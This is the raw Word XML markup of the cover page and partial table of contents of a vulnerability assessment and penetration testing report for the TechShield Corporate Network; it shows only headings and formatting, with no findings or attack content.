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57990" w14:textId="190305BA" w:rsidR="009569BD" w:rsidRPr="00F61E37" w:rsidRDefault="009569BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aharoni" w:hAnsi="Aharoni" w:cs="Aharoni"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23FF6938" w14:textId="56307EFC" w:rsidR="009569BD" w:rsidRPr="00F61E37" w:rsidRDefault="00C41537" w:rsidP="00D66C07">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aharoni" w:hAnsi="Aharoni" w:cs="Aharoni"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F61E37">
        <w:rPr>
          <w:rFonts w:ascii="Aharoni" w:hAnsi="Aharoni" w:cs="Aharoni" w:hint="cs"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VAPT Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F079E72" w14:textId="3BC93C0A" w:rsidR="009569BD" w:rsidRPr="00E65231" w:rsidRDefault="00594249" w:rsidP="00D550FE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aharoni" w:hAnsi="Aharoni" w:cs="Aharoni"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19D923D3" wp14:editId="019F98CF">
            <wp:extent cx="5589767" cy="5589767"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="121060128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1280" name="Picture 13"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4545" cy="5614545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="119D2D62" w14:textId="77777777" w:rsidR="009569BD" w:rsidRDefault="009569BD"/>
    <w:p w14:paraId="28029FDD" w14:textId="237782AB" w:rsidR="009569BD" w:rsidRPr="00F61E37" w:rsidRDefault="009569BD" w:rsidP="00F35859">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aharoni"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F61E37">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aharoni"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00E93407">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aharoni"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>repared</w:t>
      </w:r>
      <w:r w:rsidRPr="00F61E37">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aharoni"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E93407">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aharoni"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By</w:t>
      </w:r>
      <w:r w:rsidRPr="00F61E37">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aharoni"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="006777E0" w:rsidRPr="00F61E37">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aharoni"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ruchi Giradkar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423B4D3D" w14:textId="1D91B796" w:rsidR="009569BD" w:rsidRPr="00F61E37" w:rsidRDefault="009569BD" w:rsidP="00F35859">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aharoni"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F61E37">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aharoni"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Submitted To: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000C39AB" w:rsidRPr="00F61E37">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aharoni"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TechShield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000C39AB" w:rsidRPr="00F61E37">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aharoni"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Corporate Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DEFB17" w14:textId="7A3CAF1C" w:rsidR="009569BD" w:rsidRPr="00F61E37" w:rsidRDefault="009569BD" w:rsidP="00F35859">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aharoni"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F61E37">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aharoni"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Submission Date: </w:t>
      </w:r>
      <w:r w:rsidR="000C39AB" w:rsidRPr="00F61E37">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aharoni"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>15 September 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB82FCE" w14:textId="77777777" w:rsidR="006D56AE" w:rsidRDefault="006D56AE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695396B8" w14:textId="77777777" w:rsidR="00417035" w:rsidRDefault="00417035">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223EFE5B" w14:textId="41D08D0B" w:rsidR="002012E9" w:rsidRDefault="00922DBC" w:rsidP="47DF796B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="47DF796B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>TABLE OF CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="45282963"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="3DFF147E" w14:textId="2E54E11D" w:rsidR="00704167" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00704167">
            <w:instrText>TOC \o "1-3" \z \u \h</w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc1867082780">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>EXECUTIVE SUMMARY</w:t>
            </w:r>
            <w:r w:rsidR="00704167">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00704167">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00704167">
              <w:instrText>PAGEREF _Toc1867082780 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00704167">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00704167">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DC1ECCD" w14:textId="16FA0084" w:rsidR="00704167" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc65263686">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>HIGH LEVEL ASSESSMENT OVERVIEW</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc65263686 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13A67C2C" w14:textId="5364C8BE" w:rsidR="00704167" w:rsidRPr="009A5FA4" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc198618583">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Observed Security Strengths</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc198618583 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74F655A9" w14:textId="0580C83F" w:rsidR="00704167" w:rsidRPr="009A5FA4" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc401142734">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Areas for Improvement</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc401142734 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29411EA5" w14:textId="21372604" w:rsidR="00704167" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc1310842615">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Short Term Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc1310842615 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4241694C" w14:textId="0F14B2E8" w:rsidR="00704167" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc1737353370">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Long Term Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc1737353370 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62715BC7" w14:textId="50EA9440" w:rsidR="00704167" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc604734905">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>SCOPE</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc604734905 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="31DAD2F6" w14:textId="4014F6D8" w:rsidR="00704167" w:rsidRPr="009A5FA4" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc363979068">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Project Scope</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc363979068 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32DBEFE6" w14:textId="0D9CCAF5" w:rsidR="00704167" w:rsidRPr="009A5FA4" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc1320701725">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Network Information</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc1320701725 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A8F1DCD" w14:textId="2B3B9371" w:rsidR="00704167" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc1242599161">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>TESTING METHODOLOGY</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc1242599161 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F7713BF" w14:textId="53E20BE9" w:rsidR="00704167" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc1239310010">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>CLASSIFICATION DEFINITIONS</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc1239310010 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="363D4ACC" w14:textId="76CB37CE" w:rsidR="00704167" w:rsidRPr="009A5FA4" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc1359605257">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Risk Classifications</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc1359605257 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="686B47BA" w14:textId="43FFF870" w:rsidR="00704167" w:rsidRPr="009A5FA4" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc1661943102">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Exploitation Likelihood Classifications</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc1661943102 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76AB9FAE" w14:textId="67286773" w:rsidR="00704167" w:rsidRPr="009A5FA4" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc1113748474">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Business Impact Classifications</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc1113748474 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3119D2BE" w14:textId="23B6DA2F" w:rsidR="00704167" w:rsidRPr="009A5FA4" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc229491299">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Remediation Difficulty Classifications</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc229491299 \h</w:instrText>
            </w:r>
